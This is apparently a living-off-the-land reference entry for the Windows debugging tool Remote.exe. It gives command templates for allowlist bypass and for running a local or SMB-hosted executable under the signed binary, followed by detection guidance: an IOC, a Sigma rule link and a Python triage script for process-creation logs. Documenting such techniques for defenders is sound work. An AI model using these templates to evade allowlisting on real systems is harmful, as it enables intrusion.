Remote.exe
Debugging tool included with Windows Debugging Tools
Paths
C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Commands
AWL Bypass
Spawns specified executable as a child process of remote.exe
Use case: Executes a process under a trusted Microsoft signed binary
Privileges: User
Remote.exe /s {PATH:.exe} anythinghere
Execute
Spawns specified executable as a child process of remote.exe
Use case: Executes a process under a trusted Microsoft signed binary
Privileges: User
Remote.exe /s {PATH:.exe} anythinghere
Execute
Run a remote file
Use case: Executing a remote binary without saving file to disk
Privileges: User
Remote.exe /s {PATH_SMB:.exe} anythinghere
Detection
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
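The process-spawn IOC above can be applied to process-creation telemetry as in the following added example, which is not part of the original entry and is not the linked Sigma rule. It assumes events shaped like Sysmon Event ID 1 records (`Image`, `ParentImage`, `CommandLine`); the tag names, sample events, host name and file names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# The two install paths this page lists, lower-cased for comparison.
KNOWN_PATHS = {
    r"c:\program files (x86)\windows kits\10\debuggers\x64\remote.exe",
    r"c:\program files (x86)\windows kits\10\debuggers\x86\remote.exe",
}
# "/s <program>" as shown in the page's commands; the program may be quoted.
SERVER_FLAG = re.compile(r'(?i)(?:^|\s)/s\s+(?:"([^"]+)"|(\S+))')

def _name(path):
    return PureWindowsPath(path).name.lower()

def triage(event):
    """Return finding tags for one process-creation event (dict of strings)."""
    findings = []
    image = event.get("Image", "")
    if _name(event.get("ParentImage", "")) == "remote.exe":
        findings.append("child_of_remote")
    if _name(image) == "remote.exe":
        findings.append("remote_started")
        if image.lower() not in KNOWN_PATHS:
            findings.append("unexpected_location")
        m = SERVER_FLAG.search(event.get("CommandLine", ""))
        if m:
            findings.append("server_mode")
            if (m.group(1) or m.group(2)).startswith("\\\\"):
                findings.append("unc_target")
    return findings

# Constructed sample events (not real telemetry); host and file names are placeholders.
DBG = r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe"
SAMPLE_EVENTS = [
    {"Image": DBG, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": '"' + DBG + r'" /s "C:\Temp\tool.exe" anythinghere'},
    {"Image": r"C:\Users\Public\remote.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"remote.exe /s \\fileserver.example\share\tool.exe anythinghere"},
    {"Image": r"C:\Temp\tool.exe", "ParentImage": DBG,
     "CommandLine": r"C:\Temp\tool.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], "->", triage(ev))
```

On hosts where the Windows Debugging Tools are not expected, any `remote_started` or `child_of_remote` tag is worth reviewing; `unexpected_location` and `unc_target` raise the priority.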